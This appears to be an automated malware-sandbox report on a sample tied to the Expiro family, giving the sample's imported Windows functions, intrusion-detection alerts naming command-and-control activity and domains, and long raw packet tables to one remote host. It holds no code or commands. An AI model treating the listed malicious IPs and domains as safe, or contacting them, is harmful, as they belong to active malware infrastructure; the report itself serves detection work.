kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
comdlg32.dll | GetSaveFileNameA, GetOpenFileNameA
winmm.dll | PlaySoundA
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T07:05:23.409269+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.9 | 49707 | 41.185.8.252 | 443 | TCP
2024-12-10T07:05:36.062119+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.9 | 49709 | 54.244.188.177 | 80 | TCP
2024-12-10T07:05:36.654151+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49710 | 158.101.44.242 | 80 | TCP
2024-12-10T07:05:42.927993+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.9 | 49551 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:42.961779+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.9 | 49718 | TCP
2024-12-10T07:05:42.961779+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.9 | 49718 | TCP
2024-12-10T07:05:44.675082+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.9 | 49720 | TCP
2024-12-10T07:05:44.675082+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.9 | 49720 | TCP
2024-12-10T07:05:45.913984+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49710 | 158.101.44.242 | 80 | TCP
2024-12-10T07:05:46.083996+0100 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.9 | 64135 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:46.096205+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.9 | 49723 | TCP
2024-12-10T07:05:46.096205+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.9 | 49723 | TCP
2024-12-10T07:05:54.224970+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.9 | 51600 | 1.1.1.1 | 53 | UDP
2024-12-10T07:05:56.230614+0100 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.9 | 62925 | 1.1.1.1 | 53 | UDP
2024-12-10T07:06:43.512348+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.9 | 49737 | 82.112.184.197 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574512959 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574536085 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574546099 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574556112 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574564934 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574570894 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574579954 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574606895 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.574657917 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632752895 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632766008 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632810116 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632886887 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.632896900 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.633045912 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787298918 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787329912 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787483931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787483931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787499905 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.787620068 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828469992 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828530073 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828572035 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828579903 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828603983 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.828635931 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863873005 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863928080 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863955021 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.863960028 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.864053965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976447105 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976496935 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976521015 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976536989 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:24.976577997 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002614021 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002636909 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002685070 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002696037 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002739906 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.002773046 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025751114 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025804043 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025911093 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025911093 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.025923014 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.026099920 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037827015 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037846088 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037925005 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037936926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.037982941 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051800013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051821947 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051871061 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051884890 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051930904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.051930904 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064749002 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064766884 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064831972 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064842939 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.064898014 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165721893 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165746927 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165807962 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165819883 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165858030 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.165895939 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185168028 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185184956 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185283899 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185300112 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.185340881 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194875002 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194899082 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194936037 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194952011 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194967031 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.194992065 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206054926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206073046 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206135988 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206151009 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.206223965 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217278957 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217333078 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217364073 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217375994 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217396975 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.217416048 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224071026 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224092007 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224168062 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224180937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:25.224225998 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.849737883 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.849739075 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.856331110 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.856350899 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.856432915 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.856440067 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:26.856482029 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.034601927 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.034662008 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.034692049 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.034703016 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.034760952 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.041755915 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.041819096 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.041846991 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.041858912 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.041925907 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.041944981 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.047754049 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.047774076 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.047869921 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.047884941 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.047933102 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.054672003 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.054693937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.054763079 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.054773092 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.054817915 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.061439991 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.061501026 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.061508894 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.061522007 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.061567068 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.061594009 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.226391077 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.226417065 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.226486921 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.226505995 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.226556063 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.226573944 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.232223034 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.232240915 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.232323885 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.232351065 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.232386112 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.232414961 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.238770962 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.238789082 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.238863945 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.238884926 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.238939047 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.245527983 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.245548964 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.245609045 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.245635033 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.245667934 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.245692015 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.251641989 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.251660109 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.251738071 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.251766920 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.251810074 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.258893013 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.258936882 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.259059906 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.259087086 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.259114981 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.259141922 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.264897108 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.264914989 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.264952898 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.264972925 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.264997959 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.265053034 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.271791935 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.271812916 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.271915913 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.271929026 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.271954060 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.271975040 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.419670105 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.419697046 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.419859886 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.419872999 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.419922113 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.426512003 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.426533937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.426639080 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.426647902 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.426692009 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.432591915 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.432615042 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.432733059 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.432740927 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.432813883 CET49707443192.168.2.941.185.8.252
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.439536095 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.439559937 CET4434970741.185.8.252192.168.2.9
                                                                                                                                                                                                                        Dec 10, 2024 07:05:27.439682961 CET49707443192.168.2.941.185.8.252
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 07:05:27.439694881 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.439755917 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.446286917 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.446305037 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.446414948 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.446424007 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.446516037 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.452673912 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.452694893 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.452792883 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.452800989 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.452863932 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.459552050 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.459572077 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.459736109 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.459747076 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.459820986 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.465673923 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.465699911 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.465791941 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.465811968 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.465852976 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.612278938 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.612306118 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.613104105 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.613130093 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.613200903 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.618251085 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.618273020 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.619339943 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.619370937 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.619435072 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.625031948 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.625053883 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.625818968 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
Dec 10, 2024 07:05:27.625858068 CET | 443 | 49707 | 41.185.8.252 | 192.168.2.9
Dec 10, 2024 07:05:27.625983953 CET | 49707 | 443 | 192.168.2.9 | 41.185.8.252
